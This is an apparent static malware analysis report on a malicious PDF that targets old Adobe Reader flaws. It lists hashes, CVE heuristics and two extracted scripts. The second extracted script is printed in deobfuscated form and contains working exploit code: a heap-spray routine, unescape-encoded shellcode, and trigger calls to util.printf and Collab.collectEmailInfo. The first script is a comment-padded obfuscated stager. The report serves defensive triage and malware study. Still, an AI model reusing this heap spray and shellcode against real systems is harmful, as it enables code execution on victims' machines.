Malicious PDF — malware analysis report

Static analysis result for SHA-256 032a925e50018fbc…

MALICIOUS

PDF

118.6 KB
MD5: 6bc6a980528285785acf09bb54e24c0e SHA-1: 54c15d0c6666447eadfc1d9b056a6c6294fa8e27 SHA-256: 032a925e50018fbc25666f1716693855c57a6c975137092fb038b666b860ad4e
676 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains heavily obfuscated JavaScript that exploits multiple Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload, as indicated by the ClamAV detection on an extracted artifact (Js.Exploit.Shellcode-18). The primary attack vector is exploitation for client execution via JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
e94e222def07ef5e30d332c6bdb521804de5d0d21f1365daf32d25410def4099		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 626046 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function cev(gVT){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
4373dfce8fe8a8d9f2081438eedd7a3f9b5598761e0277ac70751d2588c89b43		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u9DFF%u0282%uF905%u3223%u9D05%u8982%u9145%u7209%u3019%u7209%u1C0D%u0246%u62F2%u897D%u26E9%u02CA%u9D05%u02E8%u136D%u0CCC%uF5E9%uFC1A%u938F%uEDEA%u7DCB%u6AE2%u5736%u5908%uA56D%uAEA0%uF5E2%u4B68%u758F%uD9EA%uBE8F%u6A6B%uD15E%uDF98%u716D%u0115%u7509%u039D%u9D05%u060B%u1E2E%u0669%u5D0E%uF3F7%uF36D%u76E7%uF505%u6BF5%uF46B%uFDD6%uB550%u5BDB%u5D0E%u868D%u9DFD%u0282%u6D8E%u5A39%u9D05%u6882%uF505%u46AB%uCAED%u4BEA%u92E8%u6AFC%uD68E%u5D61%u7DED%u0282%u1405%u2986%u7686%u0986%uE8C5%u8F73%u9D80%u0280%uCD05%uFDEA%u9D05%uFD82%uA950%u870F%u9905%u0282%uF755%u6882%u1005%u0207%u9D07%u5282%uC8FA%u8FBA%u9DB0%u0286%u3105%uC288%u6670%uC5CC%uB303%u7AE7%u5A60%u06C4%u9D05%u0282%u1888%u0682%u9D05%uCBB1%uCD54%u577D%uDD39%u868D%u9D85%u0282%u144D%u4EC7%u9D6D%u02C2%uF705%uFDC2%uD550%uC289%uF371%u470B%uF765%u6882%uF705%u6882%uF705%uFD82%uCD50%uC289%uC771%u02E8%u9D6D%u0282%uF701%u6882%u7405%u0228%u9D05%uFDD2%uC950%uC289%uDF71%u470B%u106D%u66C7%uF555%u4282%u9D05%u777D%u6265%u6AF7%uC8FA%u09DA%uE9C5%u8997%uF940%uC289%u9371%u777D%u6261%u62F7%uE8FA%uFDCE%uDD50%uD769%uE8FA%uFDCE%uD950%uCBA9%uCC44%u870F%u9905%u0282%u6255%u2ED7%u626F%u577D%uC835%uEE09%uE08E%u098A%uE9FA%u51C9%u438E%u89D4%uA176%u7609%uE536%uF181%u1653%u22F4%u6E06%uCBB1%uDC4C%u012F%uCBC6%uF4B1%u230A%u3A92%uE9D3%uC38A%u90CB%uF081%u7645%u3973%uC3FB%uE7F7%u165F%u8969%uB95F%uDF81%u1663%u498E%uC78E%u019E%u16D8%u8986%u5806%u59DC%u9FEE%uC2B1%u5F58%u0286%uCCED%uFD7D%uF5FA%u76F6%uA775%u2DAD%uEE64%u63EB%uED6B%u70ED%uE96B%u6BF0%uB375%u6DE1%uB268%u70F6%uF964%u2DE7%uFE3A%u33BF%uEE23%u66EB%uA938%u32B5%uFF36%u66BB%uA563%u66BB%uAA31%u61B7%uAB35%u30E7%uAB3C%u3AE0%uF863%u34E6%uAD67%u31E1%uBB37%u3FF1%u9D36%u0282%u0005");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u9DFF%u0282%uF905%u3223%u9D05%u8982%u9145%u7209%u3019%u7209%u1C0D%u0246%u62F2%u897D%u26E9%u02CA%u9D05%u02E8%u136D%u0CCC%uF5E9%uFC1A%u938F%uEDEA%u7DCB%u6AE2%u5736%u5908%uA56D%uAEA0%uF5E2%u4B68%u758F%uD9EA%uBE8F%u6A6B%uD15E%uDF98%u716D%u0115%u7509%u039D%u9D05%u060B%u1E2E%u0669%u5D0E%uF3F7%uF36D%u76E7%uF505%u6BF5%uF46B%uFDD6%uB550%u5BDB%u5D0E%u868D%u9DFD%u0282%u6D8E%u5A39%u9D05%u6882%uF505%u46AB%uCAED%u4BEA%u92E8%u6AFC%uD68E%u5D61%u7DED%u0282%u1405%u2986%u7686%u0986%uE8C5%u8F73%u9D80%u0280%uCD05%uFDEA%u9D05%uFD82%uA950%u870F%u9905%u0282%uF755%u6882%u1005%u0207%u9D07%u5282%uC8FA%u8FBA%u9DB0%u0286%u3105%uC288%u6670%uC5CC%uB303%u7AE7%u5A60%u06C4%u9D05%u0282%u1888%u0682%u9D05%uCBB1%uCD54%u577D%uDD39%u868D%u9D85%u0282%u144D%u4EC7%u9D6D%u02C2%uF705%uFDC2%uD550%uC289%uF371%u470B%uF765%u6882%uF705%u6882%uF705%uFD82%uCD50%uC289%uC771%u02E8%u9D6D%u0282%uF701%u6882%u7405%u0228%u9D05%uFDD2%uC950%uC289%uDF71%u470B%u106D%u66C7%uF555%u4282%u9D05%u777D%u6265%u6AF7%uC8FA%u09DA%uE9C5%u8997%uF940%uC289%u9371%u777D%u6261%u62F7%uE8FA%uFDCE%uDD50%uD769%uE8FA%uFDCE%uD950%uCBA9%uCC44%u870F%u9905%u0282%u6255%u2ED7%u626F%u577D%uC835%uEE09%uE08E%u098A%uE9FA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.